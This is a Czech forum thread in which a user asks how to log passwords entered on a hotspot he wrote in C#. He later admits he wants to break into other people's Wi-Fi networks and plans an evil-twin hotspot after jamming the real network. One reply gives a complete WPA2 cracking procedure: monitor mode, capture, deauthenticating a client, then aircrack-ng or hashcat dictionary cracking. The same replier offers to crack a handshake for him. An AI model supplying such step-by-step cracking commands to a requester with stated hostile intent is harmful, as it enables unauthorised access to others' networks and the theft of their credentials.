Logování hesla hotspotu

Logování hesla hotspotu
« kdy: 04. 11. 2019, 18:48:05 »
Můj problém je takový mám napsaný hotspot který klasicky funguje uživatel zadá heslo a  přihlásí se do sítě. Moje otázka je taková můžu tyto přihlašovací udaje(heslo k hotspotu) logovat? Projel jsem celí internet a nedočkal jsem se odpovědi tak kdyby někdo věděl tak napište dík
« Poslední změna: 04. 11. 2019, 22:05:47 od Petr Krčmář »


McFly

  • *****
  • 560
    • Zobrazit profil
    • E-mail
Re:logování hesla hotspotu
« Odpověď #1 kdy: 04. 11. 2019, 19:51:14 »
A v čem je ten hotspot napsaný? (i když nechápu, proč logovat přihlašovací údaje, které jsou zřejmě veřejně známé?)

Re:logování hesla hotspotu
« Odpověď #2 kdy: 04. 11. 2019, 19:53:52 »
v c#

private void Hotspot(string ssid, string key,bool status)
    {
        ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe");
        processStartInfo.RedirectStandardInput = true;
        processStartInfo.RedirectStandardOutput = true;
        processStartInfo.CreateNoWindow = true;
        processStartInfo.UseShellExecute = false;
        Process process = Process.Start(processStartInfo);

        if (process != null)
        {
            if (status)
            {
                process.StandardInput.WriteLine("netsh wlan set hostednetwork mode=allow ssid=" + ssid + " key=" + key);
                process.StandardInput.WriteLine("netsh wlan start hosted network");
                process.StandardInput.Close();
            }
            else
            {
                process.StandardInput.WriteLine("netsh wlan stop hostednetwork");
                process.StandardInput.Close();
            }
        }
    }



potřbuju logovat vstupní hesla (chybná.....)

Re:logování hesla hotspotu
« Odpověď #3 kdy: 04. 11. 2019, 20:57:06 »
Logování hesel do plaintextu je nebezpečný nápad.

Re:logování hesla hotspotu
« Odpověď #4 kdy: 04. 11. 2019, 21:11:54 »
jo nějaké nápady jak na to : ?


Re:Logování hesla hotspotu
« Odpověď #5 kdy: 04. 11. 2019, 22:19:46 »
Běž si raději hrát se sirkami do stohu ;-)

Re:Logování hesla hotspotu
« Odpověď #6 kdy: 05. 11. 2019, 10:22:45 »
Jen hadam, ale patrne bys chtel videt, jaka hesla zkouseji lide na nejakem AP, pripadne si chces vytvorit SSID jako nejaka WiFi, do ktere se chces "nabourat" a zalogovat si heslo ve chvili, kdy se do nej nejaky regularni uzivatel pokusi prihlasit.

Myslim si, ze WPA po siti posila jen hashe. Neco jako ze server posle nahodny string klientovi, klient mu vypocita HMAC podle hesla a tento HMAC se pak pouziva pro sifrovani AES pri komunikaci s AP.  Tj, klient serveru heslo vubec nerekne, takze ho serve nemuzes zalogovat. Protokol bude patrne slozitejsi, ale princip bude zhruba takovy.

Ohledne (ne)vhodnosti logovani hesel si myslim, ze tam, kde ziskanim takoveho logu s hesly treti osobou mi nijak neublizi, lze proti takovemu logovani jen tezko neco namitat. ;-)

_Jenda

  • *****
  • 1 550
    • Zobrazit profil
    • https://jenda.hrach.eu/
    • E-mail
Re:Logování hesla hotspotu
« Odpověď #7 kdy: 05. 11. 2019, 12:59:52 »
1) Pokud na primárně linuxové fórum dáváš nějaké příkazy pro jiný OS, je dobrým zvykem stručně popsat, co dělají. Já si třeba prvně myslel, že mluvíš o captive portálu, ale odhaduji, že netsh [...] key=XXX nastaví WPA2 síť. Nebo WEP? Kdo ví.

2) Pokud jde o WPA2, tak to schválně nejde, pro vysvětlení hledej wpa2 4way handshake.

Re:Logování hesla hotspotu
« Odpověď #8 kdy: 05. 11. 2019, 17:37:20 »
Jasný začátečník v oblasti sociálního inženýrství... Cílem je velmi pravděpodobně hotspot se stejným SSID a chytat hesla.

Re:Logování hesla hotspotu
« Odpověď #9 kdy: 05. 11. 2019, 19:36:33 »
Díky v všem za příspěvky napadla mě ještě jedna myšlenka jak to obejít vytvořit hotspot s WEP.

Re:Logování hesla hotspotu
« Odpověď #10 kdy: 05. 11. 2019, 23:59:27 »
Dobře prokoukli jste mě nějaké nápady jak rychle cracknout wifi síť ?

_Jenda

  • *****
  • 1 550
    • Zobrazit profil
    • https://jenda.hrach.eu/
    • E-mail
Re:Logování hesla hotspotu
« Odpověď #11 kdy: 06. 11. 2019, 08:31:08 »
Deauth klienta (vyprovokuje handshake) a zkusit to vyslovníkovat. Pokud mají dobré heslo, tak smůla. Jako slovník se mi osvědčil https://github.com/berzerk0/Probable-Wordlists + 8místná čísla + by se hodilo najít si nějaký speciální český slovníček (svůj ti bohužel dát nemohu ale pokud postneš handshake, tak ho možná zkusím projet).
Kód: [Vybrat]
- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt
Pak ještě byly nějaké zranitelnosti ve WPS pinech, což jsem nezkoumal. Pokud si nainstaluješ wifite (poslední verzi), mělo by to samo všechno otestovat.

Re:Logování hesla hotspotu
« Odpověď #12 kdy: 06. 11. 2019, 15:36:34 »
Jo o tomhle způsobu vím ale použít hrubou sílu nechci mě napadlo zbourat wifi ddosem a pak podstrčit hotspot který neni šifrovaný se stejným SSID poté by stačilo, aby se klient přihlásil a já si odchytil heslo tím bych obešel šifrovaní.

Re:Logování hesla hotspotu
« Odpověď #13 kdy: 08. 11. 2019, 12:33:32 »
Jo o tomhle způsobu vím ale použít hrubou sílu nechci mě napadlo zbourat wifi ddosem a pak podstrčit hotspot který neni šifrovaný se stejným SSID poté by stačilo, aby se klient přihlásil a já si odchytil heslo tím bych obešel šifrovaní.

Pokud me pamet (a google/wiki neklame), tak takto vazne ne.
V cele komunikaci (wpa) se Ti nikdy na AP nedostane plain-pwd. U tebe se objevi hash z plain_pwd + SSID + delky (+ mozna nejaky dalsi seed? nevim), a z hashe opacne heslo nedostanes (na to se ale pouziva berlicka v podobe rainbow-tables >> databaze ruznych hashu pro ruzne rady hesel...., takze ho nedesifrujes, ale hledas kolizi [string ktery ma stejny hash, jako hash ktery znas ty]).

Zaroven aby jsi mohl utok provest, musis byt "silnejsi" vuci klientovy (vetsi vysilaci vykon/byt blize). Dale pak to neni jen o SSID, ale musis podvrhnout i MAC adresu (/BSSID), jinak se Ti klient nepripoji (ikdyby jsi nazev mel stejny, z pohledu klienta jsou to dve rozdilna AP).

Jinak:
 https://cs.wikipedia.org/wiki/Wi-Fi_Protected_Access
 https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#Weak_password



Ber to jako podnet k nauceni se dalsich veci ;-) to se vzdy hodi...
« Poslední změna: 08. 11. 2019, 12:40:58 od tecquilka »

Re:Logování hesla hotspotu
« Odpověď #14 kdy: 08. 11. 2019, 14:14:56 »
Zaroven aby jsi mohl utok provest, musis byt "silnejsi" vuci klientovy (vetsi vysilaci vykon/byt blize). Dale pak to neni jen o SSID, ale musis podvrhnout i MAC adresu (/BSSID), jinak se Ti klient nepripoji (ikdyby jsi nazev mel stejny, z pohledu klienta jsou to dve rozdilna AP).

Nesouhlasím; nikdo a nic mi nebrání postavit se někam, kde ta napadaná síť není, ale kde se dá předpokládat přítomnost někoho, kdo ji zná. Např. ve školní jídelně spustit wifi s SSID školní knihovny. Zažil jsem podobný pokus, když jsem v letadle hodinu po vzletu objevil WiFi s SSID shodnou s freewifi odletového letiště (tam pochopitelně nešlo o odchyt hesel).
A když jsem nastavoval nový hotspot, dal jsem stejné přihlašovací údaje jako měl ten předchozí - a taky žádné zařízení neřvalo, že nesedí MAC AP.